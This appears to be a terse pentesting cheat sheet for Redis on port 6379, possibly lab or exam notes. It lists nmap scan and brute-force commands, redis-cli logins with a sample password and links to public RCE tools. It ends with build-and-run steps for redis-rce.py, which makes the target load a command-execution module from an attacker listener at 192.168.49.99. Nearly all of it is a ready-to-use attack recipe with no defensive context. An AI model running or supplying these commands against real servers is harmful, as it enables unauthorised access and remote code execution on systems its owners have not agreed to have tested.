6379 - Pentesting redis
scan
nmap
nmap -sV -p 6379 --script=redis-info.nse $IP
nmap -sV -p 6379 --script=redis-brute.nse $IP
connect
redis-cli -h $IP
redis-cli -h $IP --pass password1234
exploit 4.X / 5.X
- https://github.com/Ridter/redis-rce
- https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd /RedisModules-ExecuteCommand
make
cd /redis-rce
python3 redis-rce.py -r $IP -p 6379 -L 192.168.49.99 -P 6379 -f ../RedisModules-ExecuteCommand/module.so